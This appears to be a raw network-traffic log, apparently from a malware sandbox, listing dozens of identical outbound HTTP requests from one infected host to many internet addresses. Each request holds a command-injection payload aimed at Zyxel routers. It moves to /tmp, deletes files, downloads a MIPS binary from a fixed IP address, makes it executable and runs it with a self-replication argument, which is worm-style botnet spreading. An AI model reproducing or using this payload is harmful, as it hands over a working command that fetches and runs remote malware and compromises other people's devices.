                                                Jan 12, 2024 18:24:38.943042040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5293192.168.2.135784486.116.58.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943070889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5294192.168.2.1345508201.1.201.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943140030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5295192.168.2.1360154150.189.196.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943188906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5296192.168.2.1343402172.146.7.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943248034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5297192.168.2.1344096145.71.200.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943296909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5298192.168.2.135822832.160.29.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943371058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5299192.168.2.1339106190.8.0.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943420887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5300192.168.2.1353840103.70.38.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943486929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5301192.168.2.136003813.239.154.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943545103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5302192.168.2.1336866142.28.129.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943600893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5303192.168.2.1352694140.122.18.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943669081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5304192.168.2.135655435.43.132.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943706036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5305192.168.2.1348412175.208.44.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943742037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5306192.168.2.134311464.161.60.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943804026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5307192.168.2.1333116140.179.200.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943880081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5308192.168.2.1359226121.178.194.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943902016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5309192.168.2.133813637.175.110.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.943948984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5310192.168.2.1345990116.199.199.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.944015026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5311192.168.2.1356464173.98.254.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.944055080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5312192.168.2.135749697.94.183.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.944118023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5313192.168.2.135338836.163.15.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.944174051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5314192.168.2.134106063.134.208.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.948982000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5315192.168.2.1359854163.244.225.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949038982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5316192.168.2.134216495.117.176.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949089050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5317192.168.2.135865237.165.32.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949135065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5318192.168.2.1337506157.70.73.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949198961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5319192.168.2.13592064.194.21.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949273109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5320192.168.2.135707668.91.138.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.949330091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5321192.168.2.1336392139.100.145.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957638979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5322192.168.2.1333534172.245.246.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957673073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5323192.168.2.1334816223.32.44.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957739115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5324192.168.2.136017653.132.148.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957789898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5325192.168.2.134876069.74.117.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957845926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5326192.168.2.134375046.47.76.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957911968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5327192.168.2.1360266153.239.211.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.957973003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5328192.168.2.1360636200.46.117.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958024025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5329192.168.2.1346236159.190.66.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958065033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5330192.168.2.135343447.69.168.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958144903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5331192.168.2.135105699.156.24.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958185911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5332192.168.2.1357208166.249.167.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958214998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5333192.168.2.1357568137.170.132.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958313942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5334192.168.2.1346816120.239.12.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958372116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5335192.168.2.1338954185.120.8.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958427906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5336192.168.2.134815478.211.244.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958463907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5337192.168.2.134971465.75.214.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958554029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5338192.168.2.134852625.64.41.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958606958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5339192.168.2.1358504192.194.88.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958666086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5340192.168.2.1358180102.153.98.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958728075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5341192.168.2.13586585.243.157.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958782911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5342192.168.2.1344488122.221.36.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958837032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5343192.168.2.134787697.167.176.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958882093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5344192.168.2.1334316131.159.253.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958944082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5345192.168.2.134340860.197.153.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.958983898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5346192.168.2.1335320165.108.174.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959038019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5347192.168.2.1336126147.254.106.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959089041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5348192.168.2.133613042.125.24.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959175110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5349192.168.2.1345166159.216.172.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959208965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5350192.168.2.1340430129.191.2.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959269047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5351192.168.2.133779293.102.214.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959307909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5352192.168.2.1333516182.21.76.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959363937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5353192.168.2.134539631.124.145.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959419012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5354192.168.2.134973473.19.107.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959475040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5355192.168.2.1352262160.58.26.101443
                                                TimestampBytes transferredDirectionData
